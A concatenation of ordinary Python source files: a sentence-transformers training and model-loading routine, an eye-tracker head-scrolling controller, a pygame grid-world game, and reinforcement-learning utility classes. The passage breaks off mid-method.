`score`, `epoch`, `steps`
:param show_progress_bar: If True, output a tqdm progress bar
:param checkpoint_path: Folder to save checkpoints during training
:param checkpoint_save_steps: Will save a checkpoint after so many steps
:param checkpoint_save_total_limit: Total number of checkpoints to store
"""
##Add info to model card
#info_loss_functions = "\n".join(["- {} with {} training examples".format(str(loss), len(dataloader)) for dataloader, loss in train_objectives])
info_loss_functions = []
for dataloader, loss in train_objectives:
info_loss_functions.extend(ModelCardTemplate.get_train_objective_info(dataloader, loss))
info_loss_functions = "\n\n".join([text for text in info_loss_functions])
info_fit_parameters = json.dumps({"evaluator": fullname(evaluator), "epochs": epochs, "steps_per_epoch": steps_per_epoch, "scheduler": scheduler, "warmup_steps": warmup_steps, "optimizer_class": str(optimizer_class), "optimizer_params": optimizer_params, "weight_decay": weight_decay, "evaluation_steps": evaluation_steps, "max_grad_norm": max_grad_norm }, indent=4, sort_keys=True)
self._model_card_text = None
self._model_card_vars['{TRAINING_SECTION}'] = ModelCardTemplate.__TRAINING_SECTION__.replace("{LOSS_FUNCTIONS}", info_loss_functions).replace("{FIT_PARAMETERS}", info_fit_parameters)
if use_amp:
from torch.cuda.amp import autocast
scaler = torch.cuda.amp.GradScaler()
self.to(self._target_device)
dataloaders = [dataloader for dataloader, _ in train_objectives]
# Use smart batching
for dataloader in dataloaders:
dataloader.collate_fn = self.smart_batching_collate
loss_models = [loss for _, loss in train_objectives]
for loss_model in loss_models:
loss_model.to(self._target_device)
self.best_score = -9999999
if steps_per_epoch is None or steps_per_epoch == 0:
steps_per_epoch = min([len(dataloader) for dataloader in dataloaders])
num_train_steps = int(steps_per_epoch * epochs)
# Prepare optimizers
optimizers = []
schedulers = []
for loss_model in loss_models:
param_optimizer = list(loss_model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = optimizer_class(optimizer_grouped_parameters, **optimizer_params)
scheduler_obj = self._get_scheduler(optimizer, scheduler=scheduler, warmup_steps=warmup_steps, t_total=num_train_steps)
optimizers.append(optimizer)
schedulers.append(scheduler_obj)
global_step = 0
data_iterators = [iter(dataloader) for dataloader in dataloaders]
num_train_objectives = len(train_objectives)
skip_scheduler = False
for epoch in trange(epochs, desc="Epoch", disable=not show_progress_bar):
training_steps = 0
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
loss_list = []
for _ in trange(steps_per_epoch, desc="Iteration", smoothing=0.05, disable=not show_progress_bar):
for train_idx in range(num_train_objectives):
loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = data
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
loss_list.append(loss_value.item())
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_list.append(loss_value.item())
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch, training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
if checkpoint_path is not None and checkpoint_save_steps is not None and checkpoint_save_steps > 0 and global_step % checkpoint_save_steps == 0:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
print(f"Training Loss: {np.mean(loss_list): .4f}")
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
if evaluator is None and output_path is not None: #No evaluator, but output path: save final model version
self.save(output_path)
if checkpoint_path is not None:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
eval_path = output_path
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
eval_path = os.path.join(output_path, "eval")
os.makedirs(eval_path, exist_ok=True)
if evaluator is not None:
score = evaluator(self, output_path=eval_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
def _save_checkpoint(self, checkpoint_path, checkpoint_save_total_limit, step):
# Store new checkpoint
self.save(os.path.join(checkpoint_path, str(step)))
# Delete old checkpoints
if checkpoint_save_total_limit is not None and checkpoint_save_total_limit > 0:
old_checkpoints = []
for subdir in os.listdir(checkpoint_path):
if subdir.isdigit():
old_checkpoints.append({'step': int(subdir), 'path': os.path.join(checkpoint_path, subdir)})
if len(old_checkpoints) > checkpoint_save_total_limit:
old_checkpoints = sorted(old_checkpoints, key=lambda x: x['step'])
shutil.rmtree(old_checkpoints[0]['path'])
def _load_auto_model(self, model_name_or_path):
"""
Creates a simple Transformer + Mean Pooling model and returns the modules
"""
logger.warning("No sentence-transformers model found with name {}. Creating a new one with MEAN pooling.".format(model_name_or_path))
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension(), 'mean')
return [transformer_model, pooling_model]
    def _load_sbert_model(self, model_path):
        """
        Loads a full sentence-transformers model

        :param model_path: local directory holding modules.json plus one subfolder per module
        :return: OrderedDict mapping module name -> loaded module instance
        """
        # Check if the config_sentence_transformers.json file exists (exists since v2 of the framework)
        config_sentence_transformers_json_path = os.path.join(model_path, 'config_sentence_transformers.json')
        if os.path.exists(config_sentence_transformers_json_path):
            with open(config_sentence_transformers_json_path) as fIn:
                self._model_config = json.load(fIn)
            # NOTE(review): this compares version *strings* lexicographically
            # (e.g. '2.10.0' > '2.9.0' is False), so the warning can misfire
            # for multi-digit versions — confirm this is intended.
            if '__version__' in self._model_config and 'sentence_transformers' in self._model_config['__version__'] and self._model_config['__version__']['sentence_transformers'] > __version__:
                logger.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(self._model_config['__version__']['sentence_transformers'], __version__))
        # Check if a readme exists
        model_card_path = os.path.join(model_path, 'README.md')
        if os.path.exists(model_card_path):
            try:
                with open(model_card_path, encoding='utf8') as fIn:
                    self._model_card_text = fIn.read()
            except:
                # Best effort: an unreadable model card is not fatal
                pass
        # Load the modules of sentence transformer
        modules_json_path = os.path.join(model_path, 'modules.json')
        with open(modules_json_path) as fIn:
            modules_config = json.load(fIn)
        modules = OrderedDict()
        for module_config in modules_config:
            # Each entry names a module class (dotted import path) and its subfolder
            module_class = import_from_string(module_config['type'])
            module = module_class.load(os.path.join(model_path, module_config['path']))
            modules[module_config['name']] = module
        return modules
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that should be used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
_head_scroll.py | import threading
import time
from collections import deque
class ScrollState:
    """Enumeration of the scroller's possible states."""

    # Plain ints keep state comparisons and snapshots cheap.
    NOT_SCROLLING, SCROLLING_DOWN, SCROLLING_UP = 1, 2, 3
class Scroller(object):
def __init__(self,
eye_tracker,
mouse,
coefs=[-0.17, -0.082, -0.0025, 0.00072],
gaze_alignment_threshold=0.1,
misaligned_pitch_velocity_threshold=0.05,
stop_threshold=0.1,
shake_threshold=0.4,
check_frequency=20,
scroll_frequency=5,
smooth_frequency=10):
"""Note: check_frequency must be a multiple of scroll_frequency and
smooth_frequency.
"""
self.eye_tracker = eye_tracker
self.mouse = mouse
self.coefs = coefs
self.gaze_alignment_threshold = gaze_alignment_threshold
self.misaligned_pitch_velocity_threshold = misaligned_pitch_velocity_threshold
self.stop_threshold = stop_threshold
self.shake_threshold = shake_threshold
self.check_frequency = check_frequency
self.scroll_frequency = scroll_frequency
self.smooth_frequency = smooth_frequency
self._stop_event = None
# For visualization.
self.gaze = (0, 0)
self.rotation = (0, 0, 0)
self.smooth_pitch = 0
self.pitch_velocity = 0
self.yaw_velocity = 0
self.expected_pitch = 0
self.pinned_pitch = 0
self.min_pitch = 0
self.max_pitch = 0
self.is_scrolling = False
def start(self):
if self._stop_event:
return
# Move cursor so we scroll in the right window.
start_gaze = self.eye_tracker.get_gaze_point_or_default()
self.mouse.move((round(start_gaze[0]), round(start_gaze[1])))
stop_event = threading.Event()
thread = threading.Thread(target=lambda: self._run(stop_event))
thread.setDaemon(True)
thread.start()
self._stop_event = stop_event
def stop(self):
if not self._stop_event:
return
self._stop_event.set()
self._stop_event = None
def _run(self, stop_event):
check_period = 1.0 / self.check_frequency
scroll_period_count = 0
scroll_multiple = self.check_frequency // self.scroll_frequency
smooth_multiple = self.check_frequency // self.smooth_frequency
smooth_period = 1.0 / self.smooth_frequency
recent_rotations = deque(maxlen=smooth_multiple)
rotation = self.eye_tracker.get_head_rotation_or_default()
recent_rotations.append(rotation)
smooth_pitch = rotation[0] / smooth_multiple
pinned_pitch = rotation[0]
recent_gaze = deque(maxlen=smooth_multiple)
gaze = self.eye_tracker.get_gaze_point_or_default()
recent_gaze.append(gaze)
smooth_gaze = (gaze[0] / smooth_multiple, gaze[1] / smooth_multiple)
state = ScrollState.NOT_SCROLLING
while not stop_event.is_set():
time.sleep(check_period)
rotation = self.eye_tracker.get_head_rotation_or_default()
head_position = self.eye_tracker.get_head_position_or_default()
gaze = self.eye_tracker.get_gaze_point_or_default()
smooth_pitch += rotation[0] / smooth_multiple
smooth_gaze = (smooth_gaze[0] + gaze[0] / smooth_multiple,
smooth_gaze[1] + gaze[1] / smooth_multiple)
if len(recent_rotations) == smooth_multiple:
smooth_pitch -= recent_rotations[0][0] / smooth_multiple
smooth_gaze = (smooth_gaze[0] - recent_gaze[0][0] / smooth_multiple,
smooth_gaze[1] - recent_gaze[0][1] / smooth_multiple)
pitch_velocity = (rotation[0] - recent_rotations[0][0]) / smooth_period
yaw_velocity = (rotation[1] - recent_rotations[0][1]) / smooth_period
# Update thresholds based on gaze if not scrolling.
if state == ScrollState.NOT_SCROLLING:
monitor_size = self.eye_tracker.get_monitor_size()
expected_pitch = (self.coefs[0] +
self.coefs[1] * (smooth_gaze[1] / monitor_size[1]) +
self.coefs[2] * head_position[1] +
self.coefs[3] * head_position[2])
if not(pinned_pitch < expected_pitch and smooth_pitch < pinned_pitch or
pinned_pitch > expected_pitch and smooth_pitch > pinned_pitch):
# Eye and gaze movements are aligned, so we keep pitch in bounds.
# This allows pitch to lag gaze.
pinned_pitch = smooth_pitch
min_pitch = min(expected_pitch - self.gaze_alignment_threshold,
pinned_pitch - self.misaligned_pitch_velocity_threshold)
max_pitch = max(expected_pitch + self.gaze_alignment_threshold,
pinned_pitch + self.misaligned_pitch_velocity_threshold)
# Update state.
if smooth_pitch > max_pitch:
state = ScrollState.SCROLLING_UP
elif smooth_pitch < min_pitch:
state = ScrollState.SCROLLING_DOWN
else:
if state != ScrollState.NOT_SCROLLING:
# Reset pinned pitch so we don't start scrolling again.
pinned_pitch = smooth_pitch
state = ScrollState.NOT_SCROLLING
# if abs(yaw_velocity) > self.shake_threshold:
# pinned_pitch = smooth_pitch
# state = ScrollState.NOT_SCROLLING
# Perform scrolling. Pause if pitch is moving in the wrong direction.
is_scrolling = False
if state == ScrollState.SCROLLING_UP and pitch_velocity > -self.stop_threshold:
if scroll_period_count == 0:
speed = 2 ** round((smooth_pitch - max_pitch) / self.gaze_alignment_threshold)
self.mouse.scroll_up(speed)
scroll_period_count = (scroll_period_count + 1) % scroll_multiple
is_scrolling = True
elif state == ScrollState.SCROLLING_DOWN and pitch_velocity < self.stop_threshold:
if scroll_period_count == 0:
speed = 2 ** round((min_pitch - smooth_pitch) / self.gaze_alignment_threshold)
self.mouse.scroll_down(speed)
scroll_period_count = (scroll_period_count + 1) % scroll_multiple
is_scrolling = True
else:
scroll_period_count = 0
# Snapshot variables for visualization.
self.gaze = smooth_gaze
self.rotation = rotation
self.smooth_pitch = smooth_pitch
self.pitch_velocity = pitch_velocity
self.yaw_velocity = yaw_velocity
self.expected_pitch = expected_pitch
self.pinned_pitch = pinned_pitch
self.min_pitch = min_pitch
self.max_pitch = max_pitch
self.is_scrolling = is_scrolling
recent_rotations.append(rotation)
recent_gaze.append(gaze)
|
game.py | import numpy as np
import matplotlib.pyplot as plt
import pygame as pg
import os
import threading
from rlgw.model import WORLD, ENV
# NOTE: pygame is initialized at import time (module-level side effect).
pg.init() # load pygame modules
#~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~#
# Game Module for Grid-World
# Implements graphics and most of pygame related subs
#~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~ - ~#
class GAME:
    """Pygame front-end for a grid-world environment.

    Renders the grid, the agent, the start/end markers and a score bar, and
    runs an interactive keypad-driven game loop in ``main()``.
    """

    def __init__(self, env, print_scores=False):
        self.env = env
        self.R, self.C = self.env.R, self.env.C
        self.print_scores=print_scores
        # -for- pygame
        # size
        self.size_ratio = 50 # ratio of each cell size
        self.line_width = 2 # linewidth for gridlines
        self.width = self.C*self.size_ratio # Window width
        self.height = self.R*self.size_ratio # Window height
        # images
        # NOTE(review): `self_art_dir` is a plain local variable — presumably
        # `self.art_dir` was intended; it works since it is only used here.
        self_art_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)) , 'art')
        self.agent_img = pg.image.load(os.path.join(self_art_dir, 'agent.png'))
        self.posf_image = pg.image.load(os.path.join(self_art_dir, 'posf.png'))
        self.posi_image = pg.image.load( os.path.join(self_art_dir, 'posi.png'))
        # coordinate mapper: offsets that center the agent sprite in a cell
        ax, ay = self.agent_img.get_size()
        self.dx, self.dy = (self.size_ratio-ax)/2, (self.size_ratio-ay)/2
        # color-scale factors for positive/negative reward cells
        self.mpos=128/self.env.world.RRP[1]
        self.mneg=128/self.env.world.RRN[0]
        # colors
        self.empty_col=(255,255,255)
        self.end_col=(255,255,0)
        self.linec=(0,0,0)
        self.bgcol=(0,50,100)
        # hlast holds the last step's scores, readable from another thread
        self.hlast = {}
        self.reset_hlast()
        self.hrender = True
        self.font_family = 'consolas'
        self.font_size = int( 2.5*(self.C) )
        return

    def reset_hlast(self):
        """Reset the score snapshot (total reward, last reward, done, steps)."""
        self.hlast['tr'] = 0
        self.hlast['r'] = 0
        self.hlast['d'] = False
        self.hlast['ts'] = 0
        self.score_str = "[Score] | Steps : [0] | 0"
        return

    def update_hlast(self, total_rew, reward, done, steps):
        """Record the latest step results and refresh the score string."""
        self.hlast['tr'] = total_rew
        self.hlast['r'] = reward
        self.hlast['d'] = done
        self.hlast['ts'] = steps
        # NOTE(review): the bracketed value is the total reward and the
        # trailing value is the step count, despite the "Steps :" label.
        self.score_str = "[Score] | Steps : ["+str(total_rew) + "] | "+str(steps)
        return

    def make_screen(self):
        """ Create game screen {OTC} """
        self.reset_hlast()
        # define font
        # SysFont(name, size, bold=False, italic=False)
        self.font = pg.font.SysFont(self.font_family, min(self.font_size, 20 )) # after pygame is initialized
        # create a window or screen (pygame.display)
        self.screen = pg.display.set_mode(
            (self.width + self.line_width, self.height + self.line_width + self.size_ratio)) # screen display object
        self.screen.fill(self.bgcol) # fill back ground color
        pg.display.set_caption(self.env.name)
        self.show_lines() # create grid-lines ( one time call )
        self.show_grid() # create grid-cells ( one time call )
        pg.display.update()
        return

    def show_lines(self):
        """ Draw the grid lines {OTC} """
        # NOTE(review): GRID is unused in this method.
        GRID = self.env.GRIDbox
        for i in range(self.R):
            for j in range(self.C):
                # vertical lines
                pg.draw.line(self.screen,
                            color=self.linec,
                            start_pos=(j*self.size_ratio, 0),
                            end_pos=(j*self.size_ratio, self.height),
                            width=self.line_width)
            # end for (j)
            # last vertical line
            pg.draw.line(self.screen,
                        color=self.linec,
                        start_pos=((j+1)*self.size_ratio, 0),
                        end_pos=((j+1)*self.size_ratio,
                                self.height),
                        width=self.line_width)
            # horizontal lines
            pg.draw.line(self.screen,
                        color=self.linec,
                        start_pos=(0, i*self.size_ratio),
                        end_pos=(self.width, i*self.size_ratio),
                        width=self.line_width)
        # end for (i)
        # last horizontal line
        pg.draw.line(self.screen,
                    color=self.linec,
                    start_pos=(0, (i+1)*self.size_ratio),
                    end_pos=(self.width, (i+1)*self.size_ratio),
                    width=self.line_width)
        return

    def show_grid(self):
        """ Draw the grid cells {OTC} """
        GRID = self.env.GRIDbox
        for i in range(self.R):
            for j in range(self.C):
                # cell color: end cell / empty / negative reward / positive reward
                if GRID[i,j]==self.env.world.ER:
                    colx= self.end_col
                elif GRID[i,j]==self.env.world.EMPTY:
                    colx= self.empty_col
                elif GRID[i,j]<0:
                    colx= (int(255-(GRID[i,j])*self.mneg),0,64)
                else:
                    colx= (0, int(255-(GRID[i,j])*self.mpos), 64)
                pg.draw.rect(self.screen, colx, pg.Rect( j*self.size_ratio+self.line_width, i*self.size_ratio+self.line_width,
                                self.size_ratio-self.line_width*2, self.size_ratio-self.line_width*2))

    def make_update(self):
        """Redraw everything that can change between steps, then flip display."""
        self.update_grid()
        self.update_history()
        self.update_agent()
        self.update_score()
        pg.display.update()
        return

    def update_score(self):
        """Redraw the score bar below the grid."""
        # redraw background
        pg.draw.rect(self.screen, self.bgcol,
                    pg.Rect(self.line_width,
                            self.R*self.size_ratio+self.line_width,
                            self.width-self.line_width*2,
                            self.size_ratio-self.line_width*2))
        # display text using render(text, antialias, color, background=None)
        img_score = self.font.render(self.score_str, 1, self.empty_col, self.bgcol)
        self.screen.blit(img_score, (self.size_ratio/2, (self.R)*self.size_ratio+self.size_ratio/2))
        #img_reward = self.font.render("Steps: "+str(self.hlast['ts']), 1, self.empty_col, self.bgcol)
        #self.screen.blit(img_reward, (self.size_ratio*3+self.size_ratio/2, (self.R)*self.size_ratio+self.size_ratio/2))

    def update_agent(self):
        """Blit the agent plus the initial/final position markers."""
        self.screen.blit(self.agent_img, (self.env.POS[1]*self.size_ratio+self.dy, self.env.POS[0]*self.size_ratio+self.dx))
        self.screen.blit(self.posi_image, (self.env.POSi[1]*self.size_ratio+self.dy, self.env.POSi[0]*self.size_ratio+self.dx))
        self.screen.blit(self.posf_image, (self.env.POSF[1]*self.size_ratio+self.dy, self.env.POSF[0]*self.size_ratio+self.dx))

    def update_grid(self):
        """Redraw only the two cells touched by the last move, plus the move line."""
        GRID = self.env.GRIDbox
        posL= [(self.env.POS[0], self.env.POS[1]),
               (self.env.history[-1][0],self.env.history[-1][1]),] # only update the grid cells that changed - env.history will always have 1 item
        for i,j in posL:
            if GRID[i,j]==self.env.world.ER:
                colx= self.end_col
            elif GRID[i,j]==self.env.world.EMPTY:
                colx= self.empty_col
            elif GRID[i,j]<0:
                colx= (int(255-(GRID[i,j])*self.mneg),0, 64)
            else:
                colx= (0, int(255-(GRID[i,j])*self.mpos), 64)
            # redraw cells
            pg.draw.rect(self.screen, colx, pg.Rect( j*self.size_ratio+self.line_width, i*self.size_ratio+self.line_width,
                            self.size_ratio-self.line_width*2, self.size_ratio-self.line_width*2))
        # draw the last move
        pg.draw.line(self.screen, color=self.end_col,
                start_pos=(posL[0][1]*self.size_ratio+self.size_ratio/2, posL[0][0]*self.size_ratio+self.size_ratio/2),
                end_pos=(posL[1][1]*self.size_ratio+self.size_ratio/2, posL[1][0]*self.size_ratio+self.size_ratio/2),
                width=1)

    def update_history(self):
        if self.hrender: # render history of moves (except for the most recent move that is displayed in update_grid())
            if len(self.env.history)>1:
                # convert grid coordinates to pixel centers, then swap (row, col) -> (x, y)
                hist = np.array(self.env.history) * self.size_ratio + self.size_ratio/2
                hist[:,[0, 1]] = hist[:,[1, 0]]
                pg.draw.lines(self.screen, color=self.bgcol, closed=False, points=hist)

    def main(self):
        """ main game loop - run in a separate thread/process and read the hlast dict for scores """
        # prepare
        self.env.reset()
        steps, total_rew, done = 0,0, self.env.in_done()
        self.make_screen() # will call pg.display.update()
        going = True
        while going:
            # ~ Check Events
            for event in pg.event.get():
                if event.type == pg.QUIT:
                    going = False
                else:
                    if event.type == pg.KEYDOWN:
                        # any keypress to reset game in 'done' state
                        if event.key == pg.K_ESCAPE:
                            going = False
                        else:
                            if done:
                                self.env.reset()
                                steps,total_rew, done = 0,0, self.env.in_done()
                                self.make_screen()
                            else:
                                # numeric-keypad keys map to the 8 compass moves + stay
                                if event.key == pg.K_KP5:
                                    a='XX'
                                elif event.key == pg.K_KP4:
                                    a='WW'
                                elif event.key == pg.K_KP6:
                                    a='EE'
                                elif event.key == pg.K_KP8:
                                    a='NN'
                                elif event.key == pg.K_KP2:
                                    a='SS'
                                elif event.key == pg.K_KP9:
                                    a='NE'
                                elif event.key == pg.K_KP7:
                                    a='NW'
                                elif event.key == pg.K_KP3:
                                    a='SE'
                                elif event.key == pg.K_KP1:
                                    a='SW'
                                else:
                                    a=""
                                if a in self.env.adict:
                                    #if a>=0: # only on valid actions
                                    _, reward, done, _ = self.env.step(self.env.adict[a])
                                    total_rew+=reward
                                    steps+=1
                                    self.update_hlast(total_rew, reward, done, steps) # update scores
                                    if self.print_scores:
                                        if done:
                                            print(self.score_str)
            if going:
                self.make_update() # ~ Render
                # ~ wait thread
                # pg.time.wait(1)
        # assert(going==False) #<-- test
        pg.display.quit() # display quit here <-----------
        # pg.quit() # unload pygame modules
        return
def play():
    """ Sample Game play in pygame window """
    # Build a default 8x8 world with random start/end positions.
    world = WORLD.get_world(
        R=8, C=8,
        SP=(0, 0), EP=(5, 5),
        RNDSP=True, RNDEP=True,
        EMPTY=-1, RRN=[-8, -2], RRP=[2, 8],
        RD=0.5, PRD=0.5, ER=0,
        MAXTS=8*8*2,
        SID=None,
        name="rlgw.default.world")
    env = ENV(
        world=world,
        actions=ENV.ACTIONS,
        penalty=(False, 0),       # if True, imposes penalty on agent for staying in the same cell
        always_reinit=True,       # if True, always choose a new random initial state from distribution
        name="rlgw.default.env")
    game = GAME(env, print_scores=True)

    # Run the game loop in a worker thread and wait for it to finish.
    th = threading.Thread(target=game.main)
    th.start()
    th.join()
    print('Done!')
    return
utils.py | import csv
import json
import gym
import numpy as np
import tensorflow as tf
import os.path as osp
from gym.core import Wrapper
from multiprocessing import Process, Pipe
def sf01(arr):
    """Swap axes 0 and 1 of *arr*, then flatten them into a single axis."""
    first, second, *rest = arr.shape
    return arr.swapaxes(0, 1).reshape(first * second, *rest)
def safemean(xs):
    """Mean of *xs*, or NaN for an empty sequence (avoids a RuntimeWarning)."""
    if len(xs) == 0:
        return np.nan
    return np.mean(xs)
def explained_variance(ypred, y):
    """
    Computes fraction of variance that ypred explains about y.
    Returns 1 - Var[y-ypred] / Var[y]
    interpretation:
        ev=0  =>  might as well have predicted zero
        ev=1  =>  perfect prediction
        ev<0  =>  worse than just predicting zero
    """
    assert y.ndim == 1 and ypred.ndim == 1
    vary = np.var(y)
    if vary == 0:
        # Degenerate target: variance ratio undefined
        return np.nan
    return 1 - np.var(y - ypred) / vary
def get_all_params(model):
    """Concatenate the ``all_params`` lists of every network in *model*."""
    return [param for net in model for param in net.all_params]
def tf_sum(x, axis=None, keepdims=False):
    """Sum *x* over *axis* (TF1-style wrapper around ``tf.reduce_sum``)."""
    axes = None if axis is None else [axis]
    return tf.reduce_sum(x, axis=axes, keep_dims=keepdims)
class Pd(object):
    """
    A particular probability distribution
    """

    def flatparam(self):
        raise NotImplementedError

    def mode(self):
        raise NotImplementedError

    def neglogp(self, x):
        # Subclasses implement the negative log-probability; logp derives from it.
        raise NotImplementedError

    def kl(self, other):
        raise NotImplementedError

    def entropy(self):
        raise NotImplementedError

    def sample(self):
        raise NotImplementedError

    def logp(self, x):
        return -self.neglogp(x)
class PdType(object):
    """
    Parametrized family of probability distributions
    """

    def pdclass(self):
        raise NotImplementedError

    def pdfromflat(self, flat):
        # Instantiate the concrete distribution from its flat parameter tensor.
        cls = self.pdclass()
        return cls(flat)

    def param_shape(self):
        raise NotImplementedError

    def sample_shape(self):
        raise NotImplementedError

    def sample_dtype(self):
        raise NotImplementedError

    def param_placeholder(self, prepend_shape, name=None):
        shape = prepend_shape + self.param_shape()
        return tf.placeholder(dtype=tf.float32, shape=shape, name=name)

    def sample_placeholder(self, prepend_shape, name=None):
        shape = prepend_shape + self.sample_shape()
        return tf.placeholder(dtype=self.sample_dtype(), shape=shape, name=name)
class DiagGaussianPdType(PdType):
    """PdType for diagonal Gaussians over vectors of length *size*."""

    def __init__(self, size):
        self.size = size

    def pdclass(self):
        return DiagGaussianPd

    def param_shape(self):
        # Flat parameters are [mean, logstd], concatenated.
        return [self.size * 2]

    def sample_shape(self):
        return [self.size]

    def sample_dtype(self):
        return tf.float32
class DiagGaussianPd(Pd):
    """Diagonal Gaussian parametrized by a flat [mean, logstd] tensor."""

    def __init__(self, flat):
        self.flat = flat
        split_axis = len(flat.shape) - 1
        mean, logstd = tf.split(axis=split_axis, num_or_size_splits=2, value=flat)
        self.mean = mean
        self.logstd = logstd
        self.std = tf.exp(logstd)

    def flatparam(self):
        return self.flat

    def mode(self):
        # The mode of a Gaussian is its mean.
        return self.mean

    def neglogp(self, x):
        dim = tf.to_float(tf.shape(x)[-1])
        quad = 0.5 * tf_sum(tf.square((x - self.mean) / self.std), axis=-1)
        return quad + 0.5 * np.log(2.0 * np.pi) * dim + tf_sum(self.logstd, axis=-1)

    def kl(self, other):
        assert isinstance(other, DiagGaussianPd)
        ratio = (tf.square(self.std) + tf.square(self.mean - other.mean)) / (2.0 * tf.square(other.std))
        return tf_sum(other.logstd - self.logstd + ratio - 0.5, axis=-1)

    def entropy(self):
        return tf_sum(self.logstd + .5 * np.log(2.0 * np.pi * np.e), axis=-1)

    def sample(self):
        noise = tf.random_normal(tf.shape(self.mean))
        return self.mean + self.std * noise

    @classmethod
    def fromflat(cls, flat):
        return cls(flat)
class VecEnv(object):
    """
    Vectorized environment base class
    """

    def step(self, vac):
        """
        Apply sequence of actions to sequence of environments
        actions -> (observations, rewards, news)

        where 'news' is a boolean vector indicating whether each element is new.
        """
        raise NotImplementedError

    def reset(self):
        """
        Reset all environments
        """
        raise NotImplementedError

    def close(self):
        # Subclasses may override to release resources.
        pass
class DummyVecEnv(VecEnv):
    """Sequential (in-process) vectorized wrapper; auto-resets finished envs."""

    def __init__(self, env_fns):
        self.envs = [make() for make in env_fns]
        first = self.envs[0]
        self.action_space = first.action_space
        self.observation_space = first.observation_space
        # Per-env step counters, cleared whenever an episode ends.
        self.ts = np.zeros(len(self.envs), dtype='int')

    def step(self, action_n):
        results = [env.step(a) for a, env in zip(action_n, self.envs)]
        obs, rews, dones, infos = map(np.array, zip(*results))
        self.ts += 1
        for i, done in enumerate(dones):
            if done:
                # Replace the terminal observation with the fresh reset one.
                obs[i] = self.envs[i].reset()
                self.ts[i] = 0
        return np.array(obs), np.array(rews), np.array(dones), infos

    def reset(self):
        return np.array([env.reset() for env in self.envs])

    def render(self):
        return self.envs[0].render()

    @property
    def num_envs(self):
        return len(self.envs)
class DummyVecTestEnv(VecEnv):
    """Like DummyVecEnv, but done episodes are NOT auto-reset (for evaluation)."""

    def __init__(self, env_fns):
        self.envs = [make() for make in env_fns]
        first = self.envs[0]
        self.action_space = first.action_space
        self.observation_space = first.observation_space
        self.ts = np.zeros(len(self.envs), dtype='int')

    def step(self, action_n):
